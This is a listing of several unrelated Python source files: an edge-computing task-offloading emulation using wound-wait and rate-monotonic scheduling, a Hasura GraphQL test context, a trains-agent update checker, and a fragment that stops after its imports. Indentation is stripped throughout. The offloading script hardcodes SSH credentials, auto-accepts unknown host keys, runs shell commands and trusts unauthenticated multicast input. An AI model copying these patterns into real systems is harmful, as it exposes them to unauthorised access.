source | python
|---|---|
7_rms_wound_wait_NS.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
from threading import Thread
import paramiko
import ast
import time
import os
import getpass as gp
import data
hosts = {} # {hostname: ip}
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
_tasks = {'t1': {'wcet': 3, 'period': 20},
't2': {'wcet': 1, 'period': 5},
't3': {'wcet': 2, 'period': 10},
't4': {'wcet': 1, 'period': 10},
't5': {'wcet': 3, 'period': 15}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
offload_register = {} # {task: host_ip}
discovering = 0 # if discovering == 0 update host
_pos = 0 # keeps track of position in the pre-generated task list
def ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_rtt(host):
rtt = pc.verbose_ping(host)
return rtt
def gcd(a, b):
if b == 0: return a
return gcd(b, a % b)
def lcm(a, b):
return int(a * b / gcd(a, b))
def LCM(list):
return reduce(lcm, list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def get_rms():
global tasks
global _pos
tasks = data.task[_pos]
_pos += 1
'''
tasks = {}
while len(tasks) < 3:
a = list(_tasks.keys())[gosh_dist(5)]
tasks[a] = _tasks[a]
'''
print('Running RMS on Tasks: ', tasks, '\n')
waiting_time_init()
a = load_tasks()
return scheduler(a)
def waiting_time_init():
global t_time
t_time = {i: [round(r.uniform(0.4, 0.8), 3), round((tasks[i]['period']) / (tasks[i]['wcet']), 3)] for i in
tasks} # t_time = {'ti': [execution_time, latency], ..}
t_time = {**t_time, **check_mec_offload()}
print('[Execution_time, Latency]: ', t_time)
def load_tasks():
global tasks
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = LCM(period_list)
# insert idle task
tasks['idle'] = {'wcet': lcm_period, 'period': lcm_period + 1}
return lcm_period
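# Illustrative sketch (not part of the original flow): how the hyperperiod used by
# load_tasks() falls out of LCM() for the static _tasks periods defined above.
# All names below already exist in this file; the helper is defined but never called.
def _example_hyperperiod():
    periods = [_tasks[t]['period'] for t in _tasks]  # [20, 5, 10, 10, 15]
    hyperperiod = LCM(periods)                       # reduce(lcm, ...) -> 60
    return hyperperiod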
def scheduler(D):
queue = list(tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for time in range(D):
# insert new tasks into the queue
for t in tmp.keys():
if time == tmp[t]['deadline']:
if tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
min = D * 2
for task in queue:
if tmp[task]['deadline'] < min:
min = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([time, curr])
if curr != 'idle': rms.append(curr)
prev = curr
return offloaded + rms
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', n_need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload, 0)
print('Execution seq: ', exec_seq)
return exec_seq
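# Illustrative sketch (defined but never called by the original code) of the per-task
# feasibility test wound_wait() applies above: a task may execute only when every
# available resource count is >= the matching entry of its need vector.
def _example_feasibility_check():
    avail = [5, 5, 5]            # available [cpu, mem, storage], as in get_exec_seq()
    need_t2 = _need['t2']        # [1, 2, 2] -> feasible
    need_t1 = _need['t1']        # [7, 4, 3] -> not feasible (7 > 5 cpu)
    return (np.greater_equal(avail, need_t2).all(),
            np.greater_equal(avail, need_t1).all())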
def get_exec_seq(pro):
global P
global R
# Number of processes
P = len(pro)
# Number of resources
R = 3
processes = ['{}_{}'.format(pro[i], i) for i in range(P)]
# Available instances of resources
avail = [5, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = '_'.join(i.split('_')[:-1]) # i = 't5_3_3', j = 't5_3'
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
w_send = time_dic[list(time_dic.keys())[-1]]
send_message(str(w_send)) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time['_'.join(i.split('_')[:-1])][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return avg1
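# Illustrative sketch (not used by the original flow): the cumulative-average update
# above, avg_n = ((n - 1) * avg_(n-1) + x_n) / n, reproduces the plain mean of the
# samples seen so far.
def _example_cumulative_average():
    samples = [2.0, 4.0, 6.0]
    avg, count = 0.0, 0
    for x in samples:
        count += 1
        avg = ((count - 1) * avg + x) / count
    return avg  # 4.0 == sum(samples) / len(samples)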
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + message()
sock.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def message():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message():
global hosts
while True:
data, address = sock.recvfrom(1024)
if data.decode()[:5] == 'hello':
hosts[data.decode()[6:]] = address[0]
elif (data.decode()[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(data.decode()[7:])
# print('received: ', hosts)
elif (data.decode()[:6] != 'update') and (address[0] != host_ip):
w_time = calculate_mov_avg(address[0], float(data.decode()) + get_rtt(address[0])) # calculate moving average of MEC wait time => w_time = wait time + rtt
if address[0] in mec_waiting_time:
mec_waiting_time[address[0]].append(w_time)
else:
mec_waiting_time[address[0]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def mec_task_unicast(task, host_):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
cmd = ('echo "{} {} {}" >> /home/mec/deadlock_project/temp/task_share.txt'.format(host_ip, task, t_time[task[:2]])) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def cooperative_mec(mec_list, n):
for i in mec_list:
_host = mec_comparison()
if _host == 0:
mec_task_unicast(i, cloud_ip)
print('\n=========SENDING {} TO CLOUD==========='.format(i))
elif n == 0:
j = '_'.join(i.split('_')[:-1])
if mec_waiting_time[_host][-1] < t_time[j][1]: # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN TASK LATENCY
mec_task_unicast(i, _host) # SENDS TASK TO MEC FOR EXECUTION
mec_waiting_time[_host].append(mec_waiting_time[_host][-1] + t_time[j][0]) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
mec_task_unicast(i, cloud_ip)
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = '_'.join(i.split('_')[:-1])
if mec_waiting_time[_host][-1] < t_time[j][1]: # CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN TASK LATENCY
mec_task_unicast(i, _host) # SENDS TASK TO MEC FOR EXECUTION
mec_waiting_time[_host].append(mec_waiting_time[_host][-1] + t_time[j][0]) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
mec_task_unicast(i, cloud_ip)
print('\n=========SENDING {} TO CLOUD==========='.format(i))
def check_mec_offload():
global offloaded
offloaded = []
t_mec = {} # {t1: [execution, latency]}
try:
fr = open('/home/mec/deadlock_project/temp/task_share.txt', 'r')
t = fr.readlines()
for i in t:
ta = i[:-1].split()[1][:2] + '_' + str(t.index(i))
offloaded.append(ta)
offload_register[ta] = i[:-1].split()[0]
t_mec[ta] = ast.literal_eval(''.join(i[:-1].split()[2:]))
fr.close()
os.system('rm /home/mec/deadlock_project/temp/task_share.txt')
print('Tasks Offloaded to MEC: {}'.format(offloaded))
except Exception as e:
print('no offloaded Task!')
return t_mec
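# Worked example (hypothetical values) of the task_share.txt protocol read above.
# mec_task_unicast() on a peer appends a line "<sender_ip> <task> <[exec, latency]>",
# e.g. "192.168.0.5 t3_2 [0.5, 5.0]". For the first such line (index 0) this function
# derives ta = 't3_0', records offload_register['t3_0'] = '192.168.0.5', and stores
# t_mec['t3_0'] = [0.5, 5.0] so the offloaded task joins the local t_time table.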
def execute(local):
print('\nExecuting :', local)
send = []
for i in local:
j = '_'.join(i.split('_')[:-1])
time.sleep(t_time[j][0])
print('#' *((local.index(i) + 1) * 3), ' Executed: ', i)
if len(j) > 2:
send.append(j)
print('============== EXECUTION DONE ===============')
return send
def send_back_task(l_list):
_host_ip = ip_address()
for i in l_list:
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(offload_register[i], port, un, pw)
cmd = ('echo "{} {}" >> /home/mec/deadlock_project/temp/executed.txt'.format(i, _host_ip)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def receive_executed_task():
try:
fr = open('/home/mec/deadlock_project/temp/executed.txt', 'r')
t = fr.readlines()
for i in t:
i = i[:-1].split()
print('Received Executed task {} from {}'.format(i[0], i[1]))
fr.close()
os.system('rm /home/mec/deadlock_project/temp/executed.txt')
except Exception as e:
print('No Executed Tasks from MEC Received')
def run_me():
global discovering
global hosts
initialization()
while True:
if len(hosts) == mec_no:
print('MEC Details: ', hosts)
del hosts[message()]
discovering = 1
break
time.sleep(2)
start_loop()
def start_loop():
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
while True:
x = gp.getpass('Press any key to Start...').lower()
if x != 'exit':
for i in range(500):
rms_list = get_rms()
print('RMS List of Processes: ', rms_list, '\n')
print('\nRunning Wound-Wait Algorithm')
list_seq = get_exec_seq(rms_list)
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0], 1)
local_ = execute(compare_result[1])
if len(local_) > 0: # do only when there is a task to send back
send_back_task(local_)
receive_executed_task()
time.sleep(3)
print('\nEnter "Exit" to stop Programme!')
if x == 'exit':
print('\nProgramme Terminated')
break
def initialization():
global mec_no
global host_ip
global cloud_ip
host_ip = ip_address()
try:
mec_no = int(input('Number of MECs: ').strip())
cloud_ip = input('Cloud Server IP: ').strip()
print('\nCompiling MEC Details')
h1 = Thread(target=receive_message)
h1.start()
while True:
b = input('Send Hello Message (Y/N): ').strip().lower()
if b == 'y':
send_message('hello')
break
else:
print('\nPlease Type "y" to send Hello message\n')
except KeyboardInterrupt:
print('\nProgramme Terminated')
exit(0)
def main():
os.system('clear')
run_me()
if __name__ == "__main__":
main()
|
context.py
|
#!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config
# As a solution to this we are going to store it in PyTestConf.config
class PytestConf():
pass
class HGECtxError(Exception):
pass
class GQLWsClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'stop':
self.ws_active_query_ids.discard( frame.get('id') )
elif frame.get('type') == 'start' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(3)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'stop'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
#Do init If headers are provided
self.init(headers)
elif not self.init_done:
self.init()
if query_id is None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'start',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
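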
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if 'id' in json_msg:
query_id = json_msg['id']
if json_msg.get('type') == 'stop':
#Remove from active queries list
self.ws_active_query_ids.discard( query_id )
if query_id not in self.ws_id_query_queues:
self.ws_id_query_queues[json_msg['id']] = queue.Queue(maxsize=-1)
#Put event in the corresponding query_queue
self.ws_id_query_queues[query_id].put(json_msg)
elif json_msg['type'] != 'ka':
#Put event in the main queue
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
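# Illustrative usage sketch (hypothetical; assumes a fully configured HGECtx instance
# passed in as hge_ctx and a reachable graphql-engine). send_query() is a generator:
# it registers the query id, sends the 'start' frame, then yields websocket events
# for that id as they arrive. Defined here only as an example; never called.
def _example_ws_usage(hge_ctx):
    ws = GQLWsClient(hge_ctx, '/v1/graphql')
    events = ws.send_query({'query': 'query { __typename }'}, timeout=10)
    first_event = next(events)   # blocks until the first event for this query id
    ws.teardown()
    return first_event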
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
self.req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(self.req_json))
if req_path == "/create-user":
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-user-timeout":
time.sleep(3)
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-users":
resp, status = self.create_users()
self._send_response(status, resp)
elif req_path == "/invalid-response":
self._send_response(HTTPStatus.OK, "some-string")
elif req_path == "/mirror-action":
resp, status = self.mirror_action()
self._send_response(status, resp)
elif req_path == "/get-user-by-email":
resp, status = self.get_users_by_email(True)
self._send_response(status, resp)
elif req_path == "/get-users-by-email":
resp, status = self.get_users_by_email(False)
self._send_response(status, resp)
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
def create_user(self):
email_address = self.req_json['input']['email']
name = self.req_json['input']['name']
if not self.check_email(email_address):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($email: String! $name: String!) {
insert_user_one(object: {email: $email, name: $name}){
id
}
}
'''
query = {
'query': gql_query,
'variables': {
'email': email_address,
'name': name
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user_one']
return response, HTTPStatus.OK
def create_users(self):
inputs = self.req_json['input']['users']
for input in inputs:
email_address = input['email']
if not self.check_email(email_address):
response = {
'message': 'Email address is not valid: ' + email_address,
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($insert_inputs: [user_insert_input!]!){
insert_user(objects: $insert_inputs){
returning{
id
}
}
}
'''
query = {
'query': gql_query,
'variables': {
'insert_inputs': inputs
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user']['returning']
return response, HTTPStatus.OK
def mirror_action(self):
response = self.req_json['input']['arg']
return response, HTTPStatus.OK
def get_users_by_email(self, singleUser = False):
email = self.req_json['input']['email']
if not self.check_email(email):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
query get_user($email:String!) {
user(where:{email:{_eq:$email}},order_by: {id: asc}) {
id
}
}
'''
query = {
'query': gql_query,
'variables':{
'email':email
}
}
code,resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
if singleUser:
return resp['data']['user'][0], HTTPStatus.OK
else:
return resp['data']['user'], HTTPStatus.OK
def check_email(self, email):
regex = r'^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
return re.search(regex, email)
def execute_query(self, query):
headers = {}
admin_secret = self.hge_ctx.hge_key
if admin_secret is not None:
headers['X-Hasura-Admin-Secret'] = admin_secret
code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
self.log_message(json.dumps(resp))
return code, resp
def _send_response(self, status, body):
self.log_request(status)
self.send_response_only(status)
self.send_header('Content-Type', 'application/json')
self.send_header('Set-Cookie', 'abcd')
self.end_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
def __init__(self, hge_ctx, server_address):
handler = ActionsWebhookHandler
handler.hge_ctx = hge_ctx
super().__init__(server_address, handler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
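# Illustrative sketch (hypothetical port and thread handling, not part of the original
# fixtures): hosting the actions webhook server in a daemon thread so it can answer
# graphql-engine action calls while tests run.
def _example_run_actions_webhook(hge_ctx, port=5593):
    server = ActionsWebhookServer(hge_ctx, ('127.0.0.1', port))
    t = threading.Thread(target=server.serve_forever)
    t.daemon = True
    t.start()
    return server, t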
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(req_json))
if req_path == "/fail":
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_short":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_long":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
"""Handle requests in a separate thread."""
class EvtsWebhookServer(ThreadedHTTPServer):
def __init__(self, server_address):
self.resp_queue = queue.Queue(maxsize=1)
self.error_queue = queue.Queue()
super().__init__(server_address, EvtsWebhookHandler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def get_event(self, timeout):
return self.resp_queue.get(timeout=timeout)
def get_error_queue_size(self):
sz = 0
while not self.error_queue.empty():
self.error_queue.get()
sz = sz + 1
return sz
def is_queue_empty(self):
return self.resp_queue.empty()
def teardown(self):
self.evt_trggr_httpd.shutdown()
self.evt_trggr_httpd.server_close()
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.evt_trggr_web_server.join()
class HGECtxGQLServer:
def __init__(self, hge_urls, port=5000):
# start the graphql server
self.port = port
self._hge_urls = hge_urls
self.is_running = False
self.start_server()
def start_server(self):
if not self.is_running:
self.graphql_server = graphql_server.create_server('127.0.0.1', self.port)
self.hge_urls = graphql_server.set_hge_urls(self._hge_urls)
self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
self.gql_srvr_thread.start()
self.is_running = True
def teardown(self):
self.stop_server()
def stop_server(self):
if self.is_running:
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.is_running = False
class HGECtx:
def __init__(self, hge_url, pg_url, config):
self.http = requests.Session()
self.hge_key = config.getoption('--hge-key')
self.hge_url = hge_url
self.pg_url = pg_url
self.hge_webhook = config.getoption('--hge-webhook')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
if hge_jwt_key_file is None:
self.hge_jwt_key = None
else:
with open(hge_jwt_key_file) as f:
self.hge_jwt_key = f.read()
self.hge_jwt_conf = config.getoption('--hge-jwt-conf')
if self.hge_jwt_conf is not None:
self.hge_jwt_conf_dict = json.loads(self.hge_jwt_conf)
self.webhook_insecure = config.getoption('--test-webhook-insecure')
self.metadata_disabled = config.getoption('--test-metadata-disabled')
self.may_skip_test_teardown = False
self.function_permissions = config.getoption('--test-function-permissions')
self.engine = create_engine(self.pg_url)
self.meta = MetaData()
self.ws_read_cookie = config.getoption('--test-ws-init-cookie')
self.hge_scale_url = config.getoption('--test-hge-scale-url')
self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')
self.ws_client = GQLWsClient(self, '/v1/graphql')
# HGE version
result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
env_version = os.getenv('VERSION')
self.version = env_version if env_version else result.stdout.decode('utf-8').strip()
if not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
try:
st_code, resp = self.v1q_f('queries/clear_db.yaml')
except requests.exceptions.RequestException as e:
self.teardown()
raise HGECtxError(repr(e))
assert st_code == 200, resp
# Postgres version
pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
self.pg_version = int(pg_version_text)
def reflect_tables(self):
self.meta.reflect(bind=self.engine)
def anyq(self, u, q, h, b = None, v = None):
resp = None
if v == 'GET':
resp = self.http.get(
self.hge_url + u,
headers=h
)
elif v == 'POST' and b:
# TODO: Figure out why the requests are failing with a byte object passed in as `data`
resp = self.http.post(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PATCH' and b:
resp = self.http.patch(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PUT' and b:
resp = self.http.put(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'DELETE':
resp = self.http.delete(
self.hge_url + u,
headers=h
)
else:
resp = self.http.post(
self.hge_url + u,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
# Returning response headers to get the request id from response
return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers
def sql(self, q):
conn = self.engine.connect()
res = conn.execute(q)
conn.close()
return res
def execute_query(self, q, url_path, headers = {}):
h = headers.copy()
if self.hge_key is not None:
h['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(
self.hge_url + url_path,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
return resp.status_code, resp.json(object_pairs_hook=OrderedDict)
def v1q(self, q, headers = {}):
return self.execute_query(q, "/v1/query", headers)
def v1q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1q(yml.load(f))
def v1metadataq(self, q, headers = {}):
return self.execute_query(q, "/v1/metadata", headers)
def v1metadataq_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1metadataq(yml.load(f))
def teardown(self):
self.http.close()
self.engine.dispose()
|
check_update.py
|
import os
from time import sleep
import requests
import json
from threading import Thread
from .package.requirements import SimpleVersion
from ..version import __version__
__check_update_thread = None
def start_check_update_daemon():
global __check_update_thread
if __check_update_thread:
return
__check_update_thread = Thread(target=_check_update_daemon)
__check_update_thread.daemon = True
__check_update_thread.start()
def _check_new_version_available():
cur_version = __version__
update_server_releases = requests.get('https://updates.trains.allegro.ai/updates',
data=json.dumps({"versions": {"trains-agent": str(cur_version)}}),
timeout=3.0)
if update_server_releases.ok:
update_server_releases = update_server_releases.json()
else:
return None
trains_answer = update_server_releases.get("trains-agent", {})
latest_version = trains_answer.get("version")
latest_version = latest_version or ''
if SimpleVersion.compare_versions(cur_version, '>=', latest_version):
return None
patch_upgrade = True # latest_version.major == cur_version.major and latest_version.minor == cur_version.minor
return str(latest_version), patch_upgrade, trains_answer.get("description").split("\r\n")
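# Hedged reading of the gate above (comments only, no new API assumed): if
# SimpleVersion.compare_versions(cur_version, '>=', latest_version) holds, the agent
# is already up to date and None is returned; otherwise the caller receives
# (latest_version, patch_upgrade_flag, release_notes_lines) and prints an upgrade hint.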
def _check_update_daemon():
counter = 0
while True:
# noinspection PyBroadException
try:
latest_version = _check_new_version_available()
# only print when we begin
if latest_version:
if latest_version[1]:
sep = os.linesep
print('TRAINS-AGENT new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
latest_version[0], sep.join(latest_version[2])))
else:
print('TRAINS-SERVER new version available: upgrade to v{} is recommended!'.format(
latest_version[0]))
except Exception:
pass
# sleep until the next day
sleep(60 * 60 * 24)
counter += 1
|
http_com.py
|
from __future__ import print_function
import base64
